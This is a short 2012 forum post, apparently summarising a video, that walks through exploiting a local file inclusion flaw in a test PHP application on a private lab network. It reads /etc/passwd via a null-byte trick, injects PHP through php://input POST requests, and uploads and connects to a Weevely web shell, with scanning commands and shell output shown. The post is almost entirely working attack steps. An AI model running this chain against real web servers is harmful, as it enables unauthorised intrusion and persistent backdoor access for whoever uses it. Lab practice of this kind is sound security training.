Wubi Posted September 28, 2012 Report Posted September 28, 2012 From LFI to remote code excution with php://input POST request (super veda2012 test application) :Tools:NetdiscovernmapBurp SuiteWeevely tiny web shellFirefoxAttacker ip addr : 192.168.42.130netdiscover -r 192.168.42.0nmap -sS -sV -p 80 192.168.42.132firefox 192.168.42.132192.168.42.132/pressreleases/showPressRelease.php?releaseID=/etc/passwd%00open burpUse repeater to post request :POST /pressreleases/showPressRelease.php?releaseID=php://input%00 HTTP/1.1Create php shell:cd /pentest/web/backdoors/weevely/./weevely.py generate mypass /var/www/shell.txtUpload shell with burp post request:POST /pressreleases/showPressRelease.php?releaseID=php://input%00 HTTP/1.1Connecto to shell:./weevely.py http://192.168.42.132/pressreleases/shell.php mypassapache@localhost.localdomain:/var/www/html/pressreleases$ ls1.php2.php3.phpdefault.phpindex.phpshell.phpshowPressRelease.phpthumbsapache@localhost.localdomain:/var/www/html/pressreleases$Sursa YouTube 1 Quote